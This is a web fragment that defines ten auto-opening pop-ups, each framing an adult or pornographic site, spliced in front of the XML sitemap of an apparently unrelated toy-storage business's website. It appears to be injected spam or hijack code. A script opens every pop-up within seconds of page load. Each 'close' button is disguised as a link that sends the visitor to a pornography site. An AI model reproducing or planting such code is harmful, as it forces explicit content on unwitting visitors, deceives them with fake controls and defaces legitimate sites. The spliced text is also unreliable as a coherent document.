
 <style>
        .firstpopup {
            right: 200px !important;
        }

        .secondpopup {
            top: 500px !important;
            left: -20px !important;
        }

        .fourthpopup {
            left: 420px !important;
        }

        .thirdpopup {
            left:-467px !important
        }

        .fifthpopup {
            top: 200px !important;
            left: -490px !important;
        }

        .sixthpopup {
            top: 200px !important;
                left: 439px !important;
        }

        .seventhpopup {
            top: 600px !important;
            left: -540px !important;
        }

        .eighthpopup {
            top: 300px !important;
            left: 350px !important;
        }

        .tenpopup {
            top: 300px !important;
            left: -467px !important;
        }

        .ninepopup {
            top: 100px !important;
            left: 90px !important;
        }

        .border-modal {
            border: 2px solid #3b3838 !important;
        }

        @media (max-width: 1400px) { 
            .tenpopup {
                top: 315px !important;
                left: -348px !important;
            }
            .eighthpopup {
                top: 515px !important;
                left: 340px !important;
            }
            .thirdpopup {
                left: -319px !important;
            }
            .fourthpopup {
                left: 343px !important;
            }
            .fifthpopup {
                top: 200px !important;
                left: -342px !important;
            }
            .sixthpopup {
                top: 200px !important;
                left: 327px !important;
            }
            .seventhpopup {
                left: -357px !important;
                top: 500px !important;
            }


        }
        
        @media (max-width: 1200px) { 
        
        .seventhpopup {
            top: -21px !IMPORTANT;
            left: -325px !important;
        }
        .modal-dialog {
            max-width: 298px;
        }
        .modal-body{
            height: 296px;
            overflow: scroll;
        }
        .secondpopup {
            top: 574px !important;
        }

        .thirdpopup {
            left: 200px !important;
            top: -23px;
        }
        .fourthpopup {
            left: 200px !IMPORTANT;
            top: 330px;
        }
        .fifthpopup {
            top: 100px !important;
            left: -260px !important;
        }
        .sixthpopup {
            top: 353px !important;
            left: -200px !important;
        }
        .eighthpopup {
            top: 613px !important;
            left: 250px !important;
        }
        .ninepopup {
            top: 200px !important;
            left: 90px !important;
        }
        .tenpopup {
            top: 655px !important;
            left: -321px !important;
        }



            
        }
        @media (max-width: 992px) { 
        
        body.overflow-hidden.modal-open {
            overflow: auto !important;
        }
        .seventhpopup {
            top: -21px !IMPORTANT;
            left: -187px !important;
        }
        .modal-dialog {
            max-width: 298px;
        }
        .modal-body{
            height: 296px;
            overflow: scroll;
        }
        .secondpopup {
            top: 374px !important;
        }
        .thirdpopup {
            left: 200px !important;
            top: -23px;
        }
        .fourthpopup {
            left: 200px !IMPORTANT;
            top: 330px;
        }
        .fifthpopup {
            top: 100px !important;
            left: -260px !important;
        }
        .sixthpopup {
            top: 353px !important;
            left: -200px !important;
        }
        .eighthpopup {
            top: 483px !important;
            left: 250px !important;
        }
        .ninepopup {
            top: 200px !important;
            left: 90px !important;
        }
        .tenpopup {
            top: 530px !important;
            left: -212px !important;
        }




            
        }
        @media (max-width: 768px) {
            .modal-dialog {
                max-width: 300px;
            }
            .modal-body {
                height: 300px;
            }
            .thirdpopup {
                left: 163px !important;
                top: 37px;
            }
            .fourthpopup {
                left: 163px !IMPORTANT;
                top: 390px;
            }
            .fifthpopup {
                top: 145px !important;
                left: 0px !important;
            }
            .sixthpopup {
                top: 540px !important;
                left: -1px !important;
            }
            .seventhpopup {
                top: -21px !IMPORTANT;
                left: 80px !important;
            }
            .eighthpopup {
                top: 650px !important;
                left: 143px !important;
            }
            .tenpopup {
                top: 260px !important;
                left: 0px !important;
            }
                
        }
    </style>
</head>

<body class="overflow-hidden">
    <!-- <h1>Delayed Bootstrap Pop-ups</h1> -->

    <!-- First Pop-up -->
    <div class="modal fade firstpopup" id="popup1" tabindex="-1" role="dialog" aria-labelledby="popup1Label"
        aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content border-modal p-0 rounded-0">
                <div class="modal-body p-0">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <a href="https://a.russkoe-porno.me/all/new/"><img src="/close.png" alt="close"></a>
                    </button>
                    <iframe src="https://a.russkoe-porno.me/all/new/" height="420px" width="100%"
                        title="iframe"></iframe>
                </div>
            </div>
        </div>
    </div>

     <!--Second Pop-up -->
    <div class="modal fade secondpopup" id="popup2" tabindex="-1" role="dialog" aria-labelledby="popup2Label"
        aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content p-0 border-modal rounded-0">
                <div class="modal-body p-0">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <a href="https://a.russkoe-porno.me/all/new/"><img src="/close.png" alt="close"></a>
                    </button>
                    <iframe src="https://www.made-in-china.com/manufacturers/sex-silicone-doll.html" height="300px" width="100%" title="iframe"></iframe>
                </div>
            </div>
        </div>
    </div>

     <!--Third Pop-up -->
    <div class="modal fade thirdpopup" id="popup3" tabindex="-1" role="dialog" aria-labelledby="popup2Label"
        aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content border-modal p-0 rounded-0">
                <div class="modal-body p-0">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <a href="https://a.russkoe-porno.me/all/new/"><img src="/close.png" alt="close"></a>
                    </button>
                    <iframe src="https://www.sexysexdoll.com/" height="430px" width="100%"
                        title="iframe"></iframe>
                </div>
            </div>
        </div>
    </div>

     <!--Fourth Popup -->
    <div class="modal fade fourthpopup" id="popup4" tabindex="-1" role="dialog" aria-labelledby="popup2Label"
        aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content border-modal p-0 rounded-0">
                <div class="modal-body p-0">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <a href="https://a.russkoe-porno.me/all/new/"><img src="/close.png" alt="close"></a>
                    </button>
                    <iframe src="https://sexdollshack.com/sex-doll-shop/" height="430px" width="100%"
                        title="iframe"></iframe>
                </div>
            </div>
        </div>
    </div>


     <!--Fifth Popup -->
    <div class="modal fade fifthpopup" id="popup5" tabindex="-1" role="dialog" aria-labelledby="popup2Label"
        aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content border-modal p-0 rounded-0">
                <div class="modal-body p-0">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <a href="https://a.russkoe-porno.me/all/new/"><img src="/close.png" alt="close"></a>
                    </button>
                    <iframe src="https://worldsbeststripclubs.com/strip-clubs/poland/warsaw/strip-club/new-orleans" height="430px" width="100%" title="iframe"></iframe>
                </div>
            </div>
        </div>
    </div>

     <!--Sixth Popup -->
    <div class="modal fade sixthpopup" id="popup6" tabindex="-1" role="dialog" aria-labelledby="popup2Label"
        aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content border-modal p-0 rounded-0">
                <div class="modal-body p-0">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <a href="https://a.russkoe-porno.me/all/new/"><img src="/close.png" alt="close"></a>
                    </button>
                    <iframe src="http://xn----jtbokebcckdlay.net/" height="630px" width="100%" title="iframe"></iframe>
                </div>
            </div>
        </div>
    </div>

     <!--seventh popup -->
    <div class="modal fade seventhpopup" id="popup7" tabindex="-1" role="dialog" aria-labelledby="popup2Label"
        aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content border-modal p-0 rounded-0">
                <div class="modal-body p-0">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <a href="https://a.russkoe-porno.me/all/new/"><img src="/close.png" alt="close"></a>
                    </button>
                    <iframe src="https://xn--80atidehw4b.org/" height="430px" width="100%"
                        title="iframe"></iframe>
                </div>
            </div>
        </div>
    </div>

     <!--eighth popup -->
    <div class="modal fade eighthpopup" id="popup8" tabindex="-1" role="dialog" aria-labelledby="popup2Label"
        aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content border-modal p-0 rounded-0">
                <div class="modal-body p-0">
                    <button type="button" class="close btn-outline-danger" data-dismiss="modal" aria-label="Close">
                        <a href="https://a.russkoe-porno.me/all/new/"><img src="/close.png" alt="close"></a>
                    </button>
                    <iframe src="https://a.russkoe-porno.me/" height="430px" width="100%" title="iframe"></iframe>
                </div>
            </div>
        </div>
    </div>

     <!--nineth popup -->
    <div class="modal fade ninepopup" id="popup9" tabindex="-1" role="dialog" aria-labelledby="popup2Label"
        aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content border-modal p-0 rounded-0">
                <div class="modal-body p-0">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <a href="https://a.russkoe-porno.me/all/new/"><img src="/close.png" alt="close"></a>
                    </button>
                    <iframe src="https://sanktor.com/models" height="430px" width="100%" title="iframe"></iframe>
                </div>
            </div>
        </div>
    </div>

     <!--tenth popup -->
    <div class="modal fade tenpopup" id="popup10" tabindex="-1" role="dialog" aria-labelledby="popup2Label"
        aria-hidden="true">
        <div class="modal-dialog" role="document">
            <div class="modal-content border-modal p-0 rounded-0">
                <div class="modal-body p-0">
                    <button type="button" class="close" data-dismiss="modal" aria-label="Close">
                        <a href="https://a.russkoe-porno.me/all/new/"><img src="/close.png" alt="close"></a>
                    </button>
                    <iframe src="https://russiasexshop.com/c.html?c=79&s=2" height="430px" width="100%" title="iframe"></iframe>
                </div>
            </div>
        </div>
    </div>
 <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css">
    <!-- Include Bootstrap JS and jQuery -->
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js"></script>

    <script>
        $(document).ready(function () {
            $('#popup1').modal('show');
        });

        setTimeout(function () {
            $('#popup2').modal('show');
        }, 100);

        setTimeout(function () {
            $('#popup3').modal('show');
        }, 400);


        setTimeout(function () {
            $('#popup4').modal('show');
        }, 800);

        setTimeout(function () {
            $('#popup5').modal('show');
        }, 1200);

        setTimeout(function () {
            $('#popup6').modal('show');
        }, 1600);

        setTimeout(function () {
            $('#popup7').modal('show');
        }, 2000);

        setTimeout(function () {
            $('#popup8').modal('show');
        }, 2400);

        setTimeout(function () {
            $('#popup9').modal('show');
        }, 2800);

        setTimeout(function () {
            $('#popup10').modal('show');
        }, 3200);
    </script>
    <?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//toystoragemb.com.au/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://toystoragemb.com.au/post-sitemap.xml</loc>
		<lastmod>2025-04-17T00:16:37+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://toystoragemb.com.au/page-sitemap.xml</loc>
		<lastmod>2025-07-24T00:15:25+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://toystoragemb.com.au/rometheme_template-sitemap.xml</loc>
		<lastmod>2025-07-23T21:11:26+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://toystoragemb.com.au/romethemeform_form-sitemap.xml</loc>
		<lastmod>2025-04-24T01:56:46+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://toystoragemb.com.au/romethemeform_entry-sitemap.xml</loc>
		<lastmod>2025-11-22T00:22:12+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://toystoragemb.com.au/category-sitemap.xml</loc>
		<lastmod>2025-04-17T00:16:37+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->